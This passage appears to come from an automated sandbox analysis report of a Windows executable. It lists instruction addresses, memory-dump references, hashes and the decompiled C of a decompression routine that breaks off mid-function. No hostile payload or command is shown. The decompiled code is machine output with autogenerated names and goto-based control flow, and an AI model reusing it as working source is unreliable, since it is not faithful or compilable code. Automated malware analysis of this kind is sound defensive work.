                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bf9
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c0e
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c59
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c5e
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c76
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406ccd
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd2
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cef
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d35
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073dd
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x00407413
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040741c
                                                  0x0040741c
                                                  0x00407420
                                                  0x004075cf
                                                  0x00000000
                                                  0x004075cf
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743b
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00407441
                                                  0x00407441
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x00000000
                                                  0x00406dec
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406dcf
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x00000000
                                                  0x00407137
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x004075e5
                                                  0x004075eb
                                                  0x004075ed
                                                  0x004075f4
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                  • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                  • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                  • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
